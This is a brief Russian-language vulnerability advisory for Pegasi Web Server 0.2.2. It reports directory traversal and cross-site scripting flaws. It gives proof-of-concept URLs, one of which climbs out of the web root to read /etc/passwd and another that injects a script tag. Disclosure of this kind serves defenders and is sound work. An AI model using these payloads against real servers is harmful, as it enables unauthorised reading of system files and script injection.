Программа: Pegasi Web Server 0.2.2 

Несколько уязвимостей обнаружено в Pegasi Web Server. Удаленный пользователь может просматривать файлы на целевой системе, расположенные вне Web каталога. Удаленный пользователь может выполнить XSS нападение. 

1. Обход каталога: 

http://[host]:8080/../../../../etc/passwd
http://[host]:8080/../

2. XSS 

http://[host]:8080/<script>alert(«Test»)</script>



Оставить мнение